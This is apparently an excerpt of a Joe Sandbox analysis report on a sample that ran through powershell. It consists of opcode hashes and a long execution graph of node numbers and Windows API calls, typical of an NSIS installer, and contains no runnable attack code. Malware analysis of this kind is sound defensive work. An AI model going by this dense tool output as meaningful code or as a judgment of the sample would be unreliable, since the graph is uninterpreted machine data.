                                                                                                                                                                            • Opcode ID: d9a6f1ce5a368ae1b26801fd7f15850f27406d5dd0a47a9a0a78c5089858505c
                                                                                                                                                                            • Instruction ID: ee41b1337f3d4f2005ff37d0bd13b957577cf1578005b2ba33b47ed0e1e93f45
                                                                                                                                                                            • Opcode Fuzzy Hash: d9a6f1ce5a368ae1b26801fd7f15850f27406d5dd0a47a9a0a78c5089858505c
                                                                                                                                                                            • Instruction Fuzzy Hash: 5961AEB1A0020EEFDB64CF88C544BAEB7F2BF45301F588266E8119B290C775DD95CBA1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2622293718.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_70a0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:

Execution Graph

Execution Coverage: 16.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1380
Total number of Limit Nodes: 23
API calls 3724->3726 3811 4065e9 wsprintfW 3725->3811 3727 403dd0 3726->3727 3729 403def lstrcatW 3727->3729 3731 406570 3 API calls 3727->3731 3730 403d9e 3729->3730 3803 40404a 3730->3803 3731->3729 3734 406079 18 API calls 3735 403e21 3734->3735 3736 403eb5 3735->3736 3738 406570 3 API calls 3735->3738 3737 406079 18 API calls 3736->3737 3739 403ebb 3737->3739 3745 403e53 3738->3745 3740 403ecb LoadImageW 3739->3740 3741 4066df 21 API calls 3739->3741 3742 403f71 3740->3742 3743 403ef2 RegisterClassW 3740->3743 3741->3740 3747 40140b 2 API calls 3742->3747 3746 403f28 SystemParametersInfoW CreateWindowExW 3743->3746 3776 403a74 3743->3776 3744 403e74 lstrlenW 3749 403e82 lstrcmpiW 3744->3749 3750 403ea8 3744->3750 3745->3736 3745->3744 3748 405f9e CharNextW 3745->3748 3746->3742 3751 403f77 3747->3751 3753 403e71 3748->3753 3749->3750 3754 403e92 GetFileAttributesW 3749->3754 3752 405f71 3 API calls 3750->3752 3755 40404a 22 API calls 3751->3755 3751->3776 3756 403eae 3752->3756 3753->3744 3757 403e9e 3754->3757 3759 403f88 3755->3759 3812 4066a2 lstrcpynW 3756->3812 3757->3750 3758 405fbd 2 API calls 3757->3758 3758->3750 3761 403f94 ShowWindow 3759->3761 3762 404017 3759->3762 3764 406a26 3 API calls 3761->3764 3813 4057fa OleInitialize 3762->3813 3766 403fac 3764->3766 3765 40401d 3767 404021 3765->3767 3768 404039 3765->3768 3769 403fba GetClassInfoW 3766->3769 3771 406a26 3 API calls 3766->3771 3774 40140b 2 API calls 3767->3774 3767->3776 3770 40140b 2 API calls 3768->3770 3772 403fe4 DialogBoxParamW 3769->3772 3773 403fce GetClassInfoW RegisterClassW 3769->3773 3770->3776 3771->3769 3775 40140b 2 API calls 3772->3775 3773->3772 3774->3776 3777 40400c 3775->3777 3776->3626 3777->3776 3778->3613 3779->3658 3780->3662 3782 406a96 5 API calls 3781->3782 3783 403a82 lstrlenW 3782->3783 3784 4066a2 lstrcpynW 3783->3784 3784->3655 3785->3657 3787 405c42 3786->3787 3788 405c46 GetLastError 3786->3788 3787->3676 3788->3787 3790 405c60 3789->3790 3791 405c64 
GetLastError 3789->3791 3790->3676 3791->3790 3793 405cc4 3792->3793 3794 405cb8 CloseHandle 3792->3794 3793->3676 3794->3793 3796 401389 2 API calls 3795->3796 3797 401420 3796->3797 3797->3634 3798->3693 3799->3695 3800->3699 3801->3717 3802->3709 3804 40405e 3803->3804 3820 4065e9 wsprintfW 3804->3820 3806 4040cf 3821 404103 3806->3821 3808 403dff 3808->3734 3809 4040d4 3809->3808 3810 4066df 21 API calls 3809->3810 3810->3809 3811->3730 3812->3736 3824 40466d 3813->3824 3815 40581d 3819 405844 3815->3819 3827 401389 3815->3827 3816 40466d SendMessageW 3817 405856 OleUninitialize 3816->3817 3817->3765 3819->3816 3820->3806 3822 4066df 21 API calls 3821->3822 3823 404111 SetWindowTextW 3822->3823 3823->3809 3825 404685 3824->3825 3826 404676 SendMessageW 3824->3826 3825->3815 3826->3825 3829 401390 3827->3829 3828 4013fe 3828->3815 3829->3828 3830 4013cb MulDiv SendMessageW 3829->3830 3830->3829 3831 4015e6 3832 402dcb 21 API calls 3831->3832 3833 4015ed 3832->3833 3834 40601c 4 API calls 3833->3834 3835 4015f6 3834->3835 3836 401656 3835->3836 3837 405f9e CharNextW 3835->3837 3844 405c50 2 API calls 3835->3844 3845 405c6d 5 API calls 3835->3845 3848 40163c GetFileAttributesW 3835->3848 3849 405bf6 2 API calls 3835->3849 3838 401688 3836->3838 3839 40165b 3836->3839 3837->3835 3841 401423 28 API calls 3838->3841 3850 401423 3839->3850 3847 401680 3841->3847 3844->3835 3845->3835 3846 40166f SetCurrentDirectoryW 3846->3847 3848->3835 3849->3835 3851 405727 28 API calls 3850->3851 3852 401431 3851->3852 3853 4066a2 lstrcpynW 3852->3853 3853->3846 4165 405866 4166 405a10 4165->4166 4167 405887 GetDlgItem GetDlgItem GetDlgItem 4165->4167 4169 405a41 4166->4169 4170 405a19 GetDlgItem CreateThread CloseHandle 4166->4170 4210 404656 SendMessageW 4167->4210 4172 405a6c 4169->4172 4174 405a91 4169->4174 4175 405a58 ShowWindow ShowWindow 4169->4175 4170->4169 4171 4058f7 4179 4058fe GetClientRect GetSystemMetrics SendMessageW SendMessageW 4171->4179 4173 405acc 4172->4173 
4176 405a80 4172->4176 4177 405aa6 ShowWindow 4172->4177 4173->4174 4187 405ada SendMessageW 4173->4187 4178 404688 8 API calls 4174->4178 4212 404656 SendMessageW 4175->4212 4213 4045fa 4176->4213 4183 405ac6 4177->4183 4184 405ab8 4177->4184 4182 405a9f 4178->4182 4185 405950 SendMessageW SendMessageW 4179->4185 4186 40596c 4179->4186 4189 4045fa SendMessageW 4183->4189 4188 405727 28 API calls 4184->4188 4185->4186 4190 405971 SendMessageW 4186->4190 4191 40597f 4186->4191 4187->4182 4192 405af3 CreatePopupMenu 4187->4192 4188->4183 4189->4173 4190->4191 4194 404621 22 API calls 4191->4194 4193 4066df 21 API calls 4192->4193 4195 405b03 AppendMenuW 4193->4195 4196 40598f 4194->4196 4197 405b20 GetWindowRect 4195->4197 4198 405b33 TrackPopupMenu 4195->4198 4199 405998 ShowWindow 4196->4199 4200 4059cc GetDlgItem SendMessageW 4196->4200 4197->4198 4198->4182 4201 405b4e 4198->4201 4202 4059bb 4199->4202 4203 4059ae ShowWindow 4199->4203 4200->4182 4204 4059f3 SendMessageW SendMessageW 4200->4204 4205 405b6a SendMessageW 4201->4205 4211 404656 SendMessageW 4202->4211 4203->4202 4204->4182 4205->4205 4206 405b87 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4205->4206 4208 405bac SendMessageW 4206->4208 4208->4208 4209 405bd5 GlobalUnlock SetClipboardData CloseClipboard 4208->4209 4209->4182 4210->4171 4211->4200 4212->4172 4214 404601 4213->4214 4215 404607 SendMessageW 4213->4215 4214->4215 4215->4174 4216 404e68 4217 404e94 4216->4217 4218 404e78 4216->4218 4220 404ec7 4217->4220 4221 404e9a SHGetPathFromIDListW 4217->4221 4227 405ce6 GetDlgItemTextW 4218->4227 4223 404eb1 SendMessageW 4221->4223 4224 404eaa 4221->4224 4222 404e85 SendMessageW 4222->4217 4223->4220 4225 40140b 2 API calls 4224->4225 4225->4223 4227->4222 4228 401c68 4229 402da9 21 API calls 4228->4229 4230 401c6f 4229->4230 4231 402da9 21 API calls 4230->4231 4232 401c7c 4231->4232 4233 401c91 4232->4233 4234 402dcb 21 API calls 4232->4234 4235 401ca1 4233->4235 4236 402dcb 21 API calls 
4233->4236 4234->4233 4237 401cf8 4235->4237 4238 401cac 4235->4238 4236->4235 4239 402dcb 21 API calls 4237->4239 4240 402da9 21 API calls 4238->4240 4241 401cfd 4239->4241 4242 401cb1 4240->4242 4243 402dcb 21 API calls 4241->4243 4244 402da9 21 API calls 4242->4244 4245 401d06 FindWindowExW 4243->4245 4246 401cbd 4244->4246 4249 401d28 4245->4249 4247 401ce8 SendMessageW 4246->4247 4248 401cca SendMessageTimeoutW 4246->4248 4247->4249 4248->4249 4250 4028e9 4251 4028ef 4250->4251 4252 4028f7 FindClose 4251->4252 4253 402c4f 4251->4253 4252->4253 4254 4016f1 4255 402dcb 21 API calls 4254->4255 4256 4016f7 GetFullPathNameW 4255->4256 4257 401711 4256->4257 4263 401733 4256->4263 4260 4069ff 2 API calls 4257->4260 4257->4263 4258 401748 GetShortPathNameW 4259 402c4f 4258->4259 4261 401723 4260->4261 4261->4263 4264 4066a2 lstrcpynW 4261->4264 4263->4258 4263->4259 4264->4263 4265 401e73 GetDC 4266 402da9 21 API calls 4265->4266 4267 401e85 GetDeviceCaps MulDiv ReleaseDC 4266->4267 4268 402da9 21 API calls 4267->4268 4269 401eb6 4268->4269 4270 4066df 21 API calls 4269->4270 4271 401ef3 CreateFontIndirectW 4270->4271 4272 40265d 4271->4272 4273 402975 4274 402dcb 21 API calls 4273->4274 4275 402981 4274->4275 4276 402997 4275->4276 4277 402dcb 21 API calls 4275->4277 4278 40616d 2 API calls 4276->4278 4277->4276 4279 40299d 4278->4279 4301 406192 GetFileAttributesW CreateFileW 4279->4301 4281 4029aa 4282 402a60 4281->4282 4283 4029c5 GlobalAlloc 4281->4283 4284 402a48 4281->4284 4285 402a67 DeleteFileW 4282->4285 4286 402a7a 4282->4286 4283->4284 4287 4029de 4283->4287 4288 403396 48 API calls 4284->4288 4285->4286 4302 40361d SetFilePointer 4287->4302 4290 402a55 CloseHandle 4288->4290 4290->4282 4291 4029e4 4292 403607 ReadFile 4291->4292 4293 4029ed GlobalAlloc 4292->4293 4294 402a31 4293->4294 4295 4029fd 4293->4295 4296 406244 WriteFile 4294->4296 4297 403396 48 API calls 4295->4297 4298 402a3d GlobalFree 4296->4298 4300 402a0a 4297->4300 4298->4284 4299 402a28 
GlobalFree 4299->4294 4300->4299 4301->4281 4302->4291 4303 4014f5 SetForegroundWindow 4304 402c4f 4303->4304 4319 40197b 4320 402dcb 21 API calls 4319->4320 4321 401982 lstrlenW 4320->4321 4322 40265d 4321->4322 3885 4020fd 3886 4021c1 3885->3886 3887 40210f 3885->3887 3889 401423 28 API calls 3886->3889 3888 402dcb 21 API calls 3887->3888 3890 402116 3888->3890 3895 40231b 3889->3895 3891 402dcb 21 API calls 3890->3891 3892 40211f 3891->3892 3893 402135 LoadLibraryExW 3892->3893 3894 402127 GetModuleHandleW 3892->3894 3893->3886 3896 402146 3893->3896 3894->3893 3894->3896 3905 406b05 3896->3905 3899 402190 3900 405727 28 API calls 3899->3900 3902 402167 3900->3902 3901 402157 3901->3902 3903 401423 28 API calls 3901->3903 3902->3895 3904 4021b3 FreeLibrary 3902->3904 3903->3902 3904->3895 3910 4066c4 WideCharToMultiByte 3905->3910 3907 406b22 3908 406b29 GetProcAddress 3907->3908 3909 402151 3907->3909 3908->3909 3909->3899 3909->3901 3910->3907 4330 402b7e 4331 402bd0 4330->4331 4332 402b85 4330->4332 4333 406a96 5 API calls 4331->4333 4335 402da9 21 API calls 4332->4335 4336 402bce 4332->4336 4334 402bd7 4333->4334 4337 402dcb 21 API calls 4334->4337 4338 402b93 4335->4338 4339 402be0 4337->4339 4340 402da9 21 API calls 4338->4340 4339->4336 4341 402be4 IIDFromString 4339->4341 4343 402b9f 4340->4343 4341->4336 4342 402bf3 4341->4342 4342->4336 4348 4066a2 lstrcpynW 4342->4348 4347 4065e9 wsprintfW 4343->4347 4345 402c10 CoTaskMemFree 4345->4336 4347->4336 4348->4345 4349 401000 4350 401037 BeginPaint GetClientRect 4349->4350 4351 40100c DefWindowProcW 4349->4351 4353 4010f3 4350->4353 4354 401179 4351->4354 4355 401073 CreateBrushIndirect FillRect DeleteObject 4353->4355 4356 4010fc 4353->4356 4355->4353 4357 401102 CreateFontIndirectW 4356->4357 4358 401167 EndPaint 4356->4358 4357->4358 4359 401112 6 API calls 4357->4359 4358->4354 4359->4358 4360 402a80 4361 402da9 21 API calls 4360->4361 4362 402a86 4361->4362 4363 402ac9 4362->4363 4364 402aad 4362->4364 
4368 402953 4362->4368 4366 402ae3 4363->4366 4367 402ad3 4363->4367 4365 402ab2 4364->4365 4373 402ac3 4364->4373 4374 4066a2 lstrcpynW 4365->4374 4370 4066df 21 API calls 4366->4370 4369 402da9 21 API calls 4367->4369 4369->4373 4370->4373 4373->4368 4375 4065e9 wsprintfW 4373->4375 4374->4368 4375->4368 3327 401781 3333 402dcb 3327->3333 3331 40178f 3332 4061c1 2 API calls 3331->3332 3332->3331 3334 402dd7 3333->3334 3335 4066df 21 API calls 3334->3335 3336 402df8 3335->3336 3337 401788 3336->3337 3338 406950 5 API calls 3336->3338 3339 4061c1 3337->3339 3338->3337 3340 4061ce GetTickCount GetTempFileNameW 3339->3340 3341 406208 3340->3341 3342 406204 3340->3342 3341->3331 3342->3340 3342->3341 3343 403c82 3344 403c93 CloseHandle 3343->3344 3345 403c9d 3343->3345 3344->3345 3346 403cb1 3345->3346 3347 403ca7 CloseHandle 3345->3347 3352 403cdf 3346->3352 3347->3346 3353 403ced 3352->3353 3354 403cb6 3353->3354 3355 403cf2 FreeLibrary GlobalFree 3353->3355 3356 405dae 3354->3356 3355->3354 3355->3355 3392 406079 3356->3392 3359 405dd6 DeleteFileW 3366 403cc2 3359->3366 3360 405f0d 3360->3366 3435 4069ff FindFirstFileW 3360->3435 3361 405ded 3361->3360 3406 4066a2 lstrcpynW 3361->3406 3363 405e13 3364 405e26 3363->3364 3365 405e19 lstrcatW 3363->3365 3407 405fbd lstrlenW 3364->3407 3367 405e2c 3365->3367 3370 405e3c lstrcatW 3367->3370 3372 405e47 lstrlenW FindFirstFileW 3367->3372 3370->3372 3372->3360 3390 405e69 3372->3390 3375 405ef0 FindNextFileW 3378 405f06 FindClose 3375->3378 3375->3390 3376 405d66 5 API calls 3379 405f48 3376->3379 3378->3360 3380 405f62 3379->3380 3381 405f4c 3379->3381 3383 405727 28 API calls 3380->3383 3381->3366 3384 405727 28 API calls 3381->3384 3383->3366 3386 405f59 3384->3386 3385 405dae 64 API calls 3385->3390 3387 406462 40 API calls 3386->3387 3387->3366 3388 405727 28 API calls 3388->3375 3390->3375 3390->3385 3390->3388 3411 4066a2 lstrcpynW 3390->3411 3412 405d66 3390->3412 3420 405727 3390->3420 3431 406462 MoveFileExW 
3390->3431 3441 4066a2 lstrcpynW 3392->3441 3394 40608a 3442 40601c CharNextW CharNextW 3394->3442 3397 405dce 3397->3359 3397->3361 3398 406950 5 API calls 3404 4060a0 3398->3404 3399 4060d1 lstrlenW 3400 4060dc 3399->3400 3399->3404 3401 405f71 3 API calls 3400->3401 3403 4060e1 GetFileAttributesW 3401->3403 3402 4069ff 2 API calls 3402->3404 3403->3397 3404->3397 3404->3399 3404->3402 3405 405fbd 2 API calls 3404->3405 3405->3399 3406->3363 3408 405fcb 3407->3408 3409 405fd1 CharPrevW 3408->3409 3410 405fdd 3408->3410 3409->3408 3409->3410 3410->3367 3411->3390 3448 40616d GetFileAttributesW 3412->3448 3415 405d93 3415->3390 3416 405d81 RemoveDirectoryW 3418 405d8f 3416->3418 3417 405d89 DeleteFileW 3417->3418 3418->3415 3419 405d9f SetFileAttributesW 3418->3419 3419->3415 3421 405742 3420->3421 3430 4057e4 3420->3430 3422 40575e lstrlenW 3421->3422 3423 4066df 21 API calls 3421->3423 3424 405787 3422->3424 3425 40576c lstrlenW 3422->3425 3423->3422 3426 40579a 3424->3426 3427 40578d SetWindowTextW 3424->3427 3428 40577e lstrcatW 3425->3428 3425->3430 3429 4057a0 SendMessageW SendMessageW SendMessageW 3426->3429 3426->3430 3427->3426 3428->3424 3429->3430 3430->3390 3432 406483 3431->3432 3433 406476 3431->3433 3432->3390 3451 4062e8 3433->3451 3436 405f32 3435->3436 3437 406a15 FindClose 3435->3437 3436->3366 3438 405f71 lstrlenW CharPrevW 3436->3438 3437->3436 3439 405f3c 3438->3439 3440 405f8d lstrcatW 3438->3440 3439->3376 3440->3439 3441->3394 3443 406039 3442->3443 3446 40604b 3442->3446 3445 406046 CharNextW 3443->3445 3443->3446 3444 40606f 3444->3397 3444->3398 3445->3444 3446->3444 3447 405f9e CharNextW 3446->3447 3447->3446 3449 405d72 3448->3449 3450 40617f SetFileAttributesW 3448->3450 3449->3415 3449->3416 3449->3417 3450->3449 3452 406318 3451->3452 3453 40633e GetShortPathNameW 3451->3453 3478 406192 GetFileAttributesW CreateFileW 3452->3478 3455 406353 3453->3455 3456 40645d 3453->3456 3455->3456 3457 40635b wsprintfA 3455->3457 3456->3432 3459 
4066df 21 API calls 3457->3459 3458 406322 CloseHandle GetShortPathNameW 3458->3456 3460 406336 3458->3460 3461 406383 3459->3461 3460->3453 3460->3456 3479 406192 GetFileAttributesW CreateFileW 3461->3479 3463 406390 3463->3456 3464 40639f GetFileSize GlobalAlloc 3463->3464 3465 4063c1 3464->3465 3466 406456 CloseHandle 3464->3466 3480 406215 ReadFile 3465->3480 3466->3456 3471 4063e0 lstrcpyA 3474 406402 3471->3474 3472 4063f4 3473 4060f7 4 API calls 3472->3473 3473->3474 3475 406439 SetFilePointer 3474->3475 3487 406244 WriteFile 3475->3487 3478->3458 3479->3463 3481 406233 3480->3481 3481->3466 3482 4060f7 lstrlenA 3481->3482 3483 406138 lstrlenA 3482->3483 3484 406140 3483->3484 3485 406111 lstrcmpiA 3483->3485 3484->3471 3484->3472 3485->3484 3486 40612f CharNextA 3485->3486 3486->3483 3488 406262 GlobalFree 3487->3488 3488->3466 4376 401d82 4377 402da9 21 API calls 4376->4377 4378 401d93 SetWindowLongW 4377->4378 4379 402c4f 4378->4379 4380 401503 4381 401508 4380->4381 4382 40152e 4380->4382 4383 402da9 21 API calls 4381->4383 4383->4382 4384 402903 4385 40290b 4384->4385 4386 40290f FindNextFileW 4385->4386 4388 402921 4385->4388 4387 402968 4386->4387 4386->4388 4390 4066a2 lstrcpynW 4387->4390 4390->4388 4391 401588 4392 402bc9 4391->4392 4395 4065e9 wsprintfW 4392->4395 4394 402bce 4395->4394 3881 401389 3883 401390 3881->3883 3882 4013fe 3883->3882 3884 4013cb MulDiv SendMessageW 3883->3884 3884->3883 4403 40198d 4404 402da9 21 API calls 4403->4404 4405 401994 4404->4405 4406 402da9 21 API calls 4405->4406 4407 4019a1 4406->4407 4408 402dcb 21 API calls 4407->4408 4409 4019b8 lstrlenW 4408->4409 4411 4019c9 4409->4411 4410 401a0a 4411->4410 4415 4066a2 lstrcpynW 4411->4415 4413 4019fa 4413->4410 4414 4019ff lstrlenW 4413->4414 4414->4410 4415->4413 4416 40508e GetDlgItem GetDlgItem 4417 4050e0 7 API calls 4416->4417 4428 405305 4416->4428 4418 405187 DeleteObject 4417->4418 4419 40517a SendMessageW 4417->4419 4420 405190 4418->4420 4419->4418 4422 
4051c7 4420->4422 4423 4066df 21 API calls 4420->4423 4421 4053e7 4425 405493 4421->4425 4431 405440 SendMessageW 4421->4431 4459 4052f8 4421->4459 4424 404621 22 API calls 4422->4424 4429 4051a9 SendMessageW SendMessageW 4423->4429 4430 4051db 4424->4430 4426 4054a5 4425->4426 4427 40549d SendMessageW 4425->4427 4439 4054b7 ImageList_Destroy 4426->4439 4440 4054be 4426->4440 4444 4054ce 4426->4444 4427->4426 4428->4421 4447 405374 4428->4447 4470 404fdc SendMessageW 4428->4470 4429->4420 4435 404621 22 API calls 4430->4435 4437 405455 SendMessageW 4431->4437 4431->4459 4432 4053d9 SendMessageW 4432->4421 4433 404688 8 API calls 4438 405694 4433->4438 4448 4051ec 4435->4448 4436 405648 4445 40565a ShowWindow GetDlgItem ShowWindow 4436->4445 4436->4459 4442 405468 4437->4442 4439->4440 4443 4054c7 GlobalFree 4440->4443 4440->4444 4441 4052c7 GetWindowLongW SetWindowLongW 4446 4052e0 4441->4446 4453 405479 SendMessageW 4442->4453 4443->4444 4444->4436 4462 405509 4444->4462 4475 40505c 4444->4475 4445->4459 4449 4052e5 ShowWindow 4446->4449 4450 4052fd 4446->4450 4447->4421 4447->4432 4448->4441 4452 40523f SendMessageW 4448->4452 4454 4052c2 4448->4454 4456 405291 SendMessageW 4448->4456 4457 40527d SendMessageW 4448->4457 4468 404656 SendMessageW 4449->4468 4469 404656 SendMessageW 4450->4469 4452->4448 4453->4425 4454->4441 4454->4446 4456->4448 4457->4448 4459->4433 4460 405613 4461 40561e InvalidateRect 4460->4461 4464 40562a 4460->4464 4461->4464 4463 405537 SendMessageW 4462->4463 4467 40554d 4462->4467 4463->4467 4464->4436 4484 404f97 4464->4484 4466 4055c1 SendMessageW SendMessageW 4466->4467 4467->4460 4467->4466 4468->4459 4469->4428 4471 40503b SendMessageW 4470->4471 4472 404fff GetMessagePos ScreenToClient SendMessageW 4470->4472 4473 405033 4471->4473 4472->4473 4474 405038 4472->4474 4473->4447 4474->4471 4487 4066a2 lstrcpynW 4475->4487 4477 40506f 4488 4065e9 wsprintfW 4477->4488 4479 405079 4480 40140b 2 API calls 4479->4480 4481 405082 4480->4481 
4489 4066a2 lstrcpynW 4481->4489 4483 405089 4483->4462 4490 404ece 4484->4490 4486 404fac 4486->4436 4487->4477 4488->4479 4489->4483 4491 404ee7 4490->4491 4492 4066df 21 API calls 4491->4492 4493 404f4b 4492->4493 4494 4066df 21 API calls 4493->4494 4495 404f56 4494->4495 4496 4066df 21 API calls 4495->4496 4497 404f6c lstrlenW wsprintfW SetDlgItemTextW 4496->4497 4497->4486 4498 40168f 4499 402dcb 21 API calls 4498->4499 4500 401695 4499->4500 4501 4069ff 2 API calls 4500->4501 4502 40169b 4501->4502 4503 402b10 4504 402da9 21 API calls 4503->4504 4506 402b16 4504->4506 4505 4066df 21 API calls 4507 402953 4505->4507 4506->4505 4506->4507 4508 402711 4509 402da9 21 API calls 4508->4509 4517 402720 4509->4517 4510 40285d 4511 40276a ReadFile 4511->4510 4511->4517 4512 406215 ReadFile 4512->4517 4513 406273 5 API calls 4513->4517 4514 4027aa MultiByteToWideChar 4514->4517 4515 40285f 4521 4065e9 wsprintfW 4515->4521 4517->4510 4517->4511 4517->4512 4517->4513 4517->4514 4517->4515 4518 4027d0 SetFilePointer MultiByteToWideChar 4517->4518 4519 402870 4517->4519 4518->4517 4519->4510 4520 402891 SetFilePointer 4519->4520 4520->4510 4521->4510 4522 404791 lstrlenW 4523 4047b0 4522->4523 4524 4047b2 WideCharToMultiByte 4522->4524 4523->4524 4525 401491 4526 405727 28 API calls 4525->4526 4527 401498 4526->4527 4528 404b12 4529 404b3e 4528->4529 4530 404b4f 4528->4530 4589 405ce6 GetDlgItemTextW 4529->4589 4531 404b5b GetDlgItem 4530->4531 4538 404bba 4530->4538 4533 404b6f 4531->4533 4537 404b83 SetWindowTextW 4533->4537 4541 40601c 4 API calls 4533->4541 4534 404c9e 4587 404e4d 4534->4587 4591 405ce6 GetDlgItemTextW 4534->4591 4535 404b49 4536 406950 5 API calls 4535->4536 4536->4530 4542 404621 22 API calls 4537->4542 4538->4534 4543 4066df 21 API calls 4538->4543 4538->4587 4540 404688 8 API calls 4545 404e61 4540->4545 4546 404b79 4541->4546 4547 404b9f 4542->4547 4548 404c2e SHBrowseForFolderW 4543->4548 4544 404cce 4549 406079 18 API calls 4544->4549 4546->4537 
4553 405f71 3 API calls 4546->4553 4550 404621 22 API calls 4547->4550 4548->4534 4551 404c46 CoTaskMemFree 4548->4551 4552 404cd4 4549->4552 4554 404bad 4550->4554 4555 405f71 3 API calls 4551->4555 4592 4066a2 lstrcpynW 4552->4592 4553->4537 4590 404656 SendMessageW 4554->4590 4557 404c53 4555->4557 4560 404c8a SetDlgItemTextW 4557->4560 4564 4066df 21 API calls 4557->4564 4559 404bb3 4563 406a96 5 API calls 4559->4563 4560->4534 4561 404ceb 4562 406a96 5 API calls 4561->4562 4571 404cf2 4562->4571 4563->4538 4565 404c72 lstrcmpiW 4564->4565 4565->4560 4567 404c83 lstrcatW 4565->4567 4566 404d33 4593 4066a2 lstrcpynW 4566->4593 4567->4560 4569 404d3a 4570 40601c 4 API calls 4569->4570 4572 404d40 GetDiskFreeSpaceW 4570->4572 4571->4566 4575 405fbd 2 API calls 4571->4575 4576 404d8b 4571->4576 4574 404d64 MulDiv 4572->4574 4572->4576 4574->4576 4575->4571 4577 404dfc 4576->4577 4579 404f97 24 API calls 4576->4579 4578 404e1f 4577->4578 4580 40140b 2 API calls 4577->4580 4594 404643 EnableWindow 4578->4594 4581 404de9 4579->4581 4580->4578 4582 404dfe SetDlgItemTextW 4581->4582 4583 404dee 4581->4583 4582->4577 4585 404ece 24 API calls 4583->4585 4585->4577 4586 404e3b 4586->4587 4588 404a6b SendMessageW 4586->4588 4587->4540 4588->4587 4589->4535 4590->4559 4591->4544 4592->4561 4593->4569 4594->4586 3489 401794 3490 402dcb 21 API calls 3489->3490 3491 40179b 3490->3491 3492 4017c3 3491->3492 3493 4017bb 3491->3493 3544 4066a2 lstrcpynW 3492->3544 3543 4066a2 lstrcpynW 3493->3543 3496 4017c1 3500 406950 5 API calls 3496->3500 3497 4017ce 3498 405f71 3 API calls 3497->3498 3499 4017d4 lstrcatW 3498->3499 3499->3496 3517 4017e0 3500->3517 3501 4069ff 2 API calls 3501->3517 3502 40616d 2 API calls 3502->3517 3504 4017f2 CompareFileTime 3504->3517 3505 4018b2 3507 405727 28 API calls 3505->3507 3506 401889 3509 405727 28 API calls 3506->3509 3516 40189e 3506->3516 3508 4018bc 3507->3508 3528 403396 3508->3528 3509->3516 3510 4066a2 lstrcpynW 3510->3517 3513 4018e3 
SetFileTime 3515 4018f5 CloseHandle 3513->3515 3514 4066df 21 API calls 3514->3517 3515->3516 3518 401906 3515->3518 3517->3501 3517->3502 3517->3504 3517->3505 3517->3506 3517->3510 3517->3514 3523 405d02 MessageBoxIndirectW 3517->3523 3527 406192 GetFileAttributesW CreateFileW 3517->3527 3519 40190b 3518->3519 3520 40191e 3518->3520 3521 4066df 21 API calls 3519->3521 3522 4066df 21 API calls 3520->3522 3524 401913 lstrcatW 3521->3524 3525 401926 3522->3525 3523->3517 3524->3525 3526 405d02 MessageBoxIndirectW 3525->3526 3526->3516 3527->3517 3529 4033c1 3528->3529 3530 4033a5 SetFilePointer 3528->3530 3545 40349e GetTickCount 3529->3545 3530->3529 3533 4018cf 3533->3513 3533->3515 3534 406215 ReadFile 3535 4033e1 3534->3535 3535->3533 3536 40349e 46 API calls 3535->3536 3537 4033f8 3536->3537 3537->3533 3538 403464 ReadFile 3537->3538 3540 403407 3537->3540 3538->3533 3540->3533 3541 406215 ReadFile 3540->3541 3542 406244 WriteFile 3540->3542 3541->3540 3542->3540 3543->3496 3544->3497 3546 4035f6 3545->3546 3547 4034cc 3545->3547 3548 403053 36 API calls 3546->3548 3558 40361d SetFilePointer 3547->3558 3550 4033c8 3548->3550 3550->3533 3550->3534 3551 4034d7 SetFilePointer 3555 4034fc 3551->3555 3555->3550 3556 406244 WriteFile 3555->3556 3557 4035d7 SetFilePointer 3555->3557 3559 403607 3555->3559 3562 406c11 3555->3562 3569 403053 3555->3569 3556->3555 3557->3546 3558->3551 3560 406215 ReadFile 3559->3560 3561 40361a 3560->3561 3561->3555 3563 406c36 3562->3563 3564 406c3e 3562->3564 3563->3555 3564->3563 3565 406cc5 GlobalFree 3564->3565 3566 406cce GlobalAlloc 3564->3566 3567 406d45 GlobalAlloc 3564->3567 3568 406d3c GlobalFree 3564->3568 3565->3566 3566->3563 3566->3564 3567->3563 3567->3564 3568->3567 3570 403064 3569->3570 3571 40307c 3569->3571 3572 403074 3570->3572 3573 40306d DestroyWindow 3570->3573 3574 403084 3571->3574 3575 40308c GetTickCount 3571->3575 3572->3555 3573->3572 3584 406ad2 3574->3584 3575->3572 3577 40309a 3575->3577 3578 4030a2 
3577->3578 3579 4030cf CreateDialogParamW ShowWindow 3577->3579 3578->3572 3588 403037 3578->3588 3579->3572 3581 4030b0 wsprintfW 3582 405727 28 API calls 3581->3582 3583 4030cd 3582->3583 3583->3572 3585 406aef PeekMessageW 3584->3585 3586 406ae5 DispatchMessageW 3585->3586 3587 406aff 3585->3587 3586->3585 3587->3572 3589 403046 3588->3589 3590 403048 MulDiv 3588->3590 3589->3590 3590->3581 4595 401a97 4596 402da9 21 API calls 4595->4596 4597 401aa0 4596->4597 4598 402da9 21 API calls 4597->4598 4599 401a45 4598->4599 4600 401598 4601 4015b1 4600->4601 4602 4015a8 ShowWindow 4600->4602 4603 402c4f 4601->4603 4604 4015bf ShowWindow 4601->4604 4602->4601 4604->4603 4605 402419 4606 402dcb 21 API calls 4605->4606 4607 402428 4606->4607 4608 402dcb 21 API calls 4607->4608 4609 402431 4608->4609 4610 402dcb 21 API calls 4609->4610 4611 40243b GetPrivateProfileStringW 4610->4611 4612 40201b 4613 402dcb 21 API calls 4612->4613 4614 402022 4613->4614 4615 4069ff 2 API calls 4614->4615 4616 402028 4615->4616 4618 402039 4616->4618 4619 4065e9 wsprintfW 4616->4619 4619->4618 4620 40569b 4621 4056ab 4620->4621 4622 4056bf 4620->4622 4623 4056b1 4621->4623 4624 405708 4621->4624 4625 4056c7 IsWindowVisible 4622->4625 4631 4056de 4622->4631 4627 40466d SendMessageW 4623->4627 4626 40570d CallWindowProcW 4624->4626 4625->4624 4628 4056d4 4625->4628 4629 4056bb 4626->4629 4627->4629 4630 404fdc 5 API calls 4628->4630 4630->4631 4631->4626 4632 40505c 4 API calls 4631->4632 4632->4624 4633 401b9c 4634 402dcb 21 API calls 4633->4634 4635 401ba3 4634->4635 4636 402da9 21 API calls 4635->4636 4637 401bac wsprintfW 